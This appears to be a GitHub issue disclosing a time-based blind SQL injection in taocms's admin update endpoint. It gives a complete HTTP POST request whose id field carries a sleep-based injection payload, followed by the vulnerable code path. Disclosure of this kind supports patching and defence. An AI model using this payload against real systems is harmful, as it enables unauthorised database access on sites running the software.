taocms There is SQL blind injection at "Admin Update"

There is SQL blind injection at "Admin Update"

Open Whippet0 opened this issue 3 years ago • 0 comments

POST /admin/admin.php HTTP/1.1
Host: taocms.test
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://taocms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://taocms.test/admin/admin.php?action=admin&id=2&ctrl=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=aa3a5livo36mssl5dqhmf5dc62
Connection: close

name=admin&passwd=tao&auth_level=admin&auth_cat=&status=1&action=admin&id=2)and(sleep(5))--+&ctrl=update&Submit=%E6%8F%90%E4%BA%A4

admin/admin.php

include/Model/Admin.php::update

include/Db/Mysql.php::updatelist

include/Db/Mysql.php::query

Jan 15 '22 18:01 Whippet0

taocms taocms copied to clipboard

There is SQL blind injection at "Admin Update"

taocms
taocms copied to clipboard